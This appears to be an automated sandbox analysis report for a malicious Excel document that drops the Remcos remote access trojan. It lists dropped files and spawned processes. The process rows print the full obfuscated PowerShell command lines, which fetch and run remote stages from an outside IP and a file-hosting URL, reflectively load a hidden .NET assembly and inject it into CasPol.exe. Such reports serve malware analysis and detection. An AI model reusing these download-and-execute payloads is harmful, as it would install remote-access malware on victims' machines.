Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
pi-77159.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 07:51:58 2024, Security: 1
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\pi-77159.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (376), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C8746C0.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33602862.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67917077.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79D883FE.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD8B18FB.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\0r22czlu.zkp.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\0rf0iaok.led.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\4tvqhsdt.koz.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx
|
Microsoft Excel 2007+
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES1F34.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:58:00 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESB76D.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 15:57:33 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ayj54ozr.0ba.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bxaohfbf.wp4.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cww1w05q.zch.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\dbmivtth.p1c.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hdfkhux0.j1l.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\idl0ksdl.di3.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\kfqeut3r.2su.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\m05yw41v.4xz.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qgk1oeyy.wdn.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\telbbya3.lv2.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\uwv0fjoc.cxg.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\w2mklldr.nlr.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xijxxvat\CSCB7FD98358CD1456E9F7F690FA2FF526.TMP
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (373)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dll
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\ywosddyq.it4.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF12D407234E5995C3.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFBE08681E0A930E94.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFF6C6553DBC7A7BC2.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\38630000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 15:57:45 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\38630000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex
bYPAsS -NOp -W 1
-C dEvICeCredEntIaldepLoYmENT ;
INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f
ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag
= ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex
= opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length
= opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed
= -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes
= [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod
= [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd,
ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex
bYPAsS -NOp -W 1
-C dEvICeCredEntIaldepLoYmENT ;
INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f
ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag
= ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex
= opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length
= opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed
= -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes
= [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod
= [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd,
ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp"
"c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"
|
||
|
